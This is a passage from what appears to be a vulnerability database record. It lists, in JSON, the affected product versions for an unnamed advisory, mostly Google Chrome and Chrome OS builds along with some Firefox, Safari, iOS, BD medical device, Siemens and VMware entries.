"eq", "trust": 0.3, "vendor": "apple", "version": "7.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.724.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.4" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.431.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.51" }, { "model": "facscalibur", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.3" }, { "model": "facscanto 10-color clinical", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.406.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.938.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.515.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.36" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.6" }, { "model": "viper xtr", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.55" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.409.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.4" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.315.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.119" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.54" }, { "model": "enterprise linux for power little endian", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "facsaria i/ii/iii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.741.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.27" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.170.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.588.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.59" }, { "model": "windows server for x64-based systems sp2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "41.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1045.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.799.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1073.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.792.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.1.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "43.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.322" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.33" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1279.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.272.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.97" }, { "model": "pyxis medstation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "35000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.411.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.367.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1016" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1045" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.454.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.79" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.53" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1029.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.337.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.54" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1032" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.0" }, { "model": "lsrfortessa", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.945.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "52.0.2743.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "44.0.2403" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.895.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.355.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "57.0.2987.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.5" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.308.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "50.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "19.0.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.44" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.234" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.171" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.0" }, { "model": "pixel xl", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.650.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "51.0.2704.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.338.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.451.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.114" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.59" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.3" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.0" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "pyxis cubie replenishment station", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.427.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "19.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1024" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.276.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.0" }, { "model": "cortex a57", "scope": "eq", "trust": 0.3, "vendor": "arm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.574.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "39.0.2171.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.320.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.72" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "32.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.946.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.888.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.5" }, { "model": "security analytics", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.224.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1678.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.33" }, { "model": "ruggedcom ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.704.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.60" }, { "model": "bactec fx40", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1035" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1291.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.59" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.3.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.57" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.31" }, { "model": "chrome", "scope": 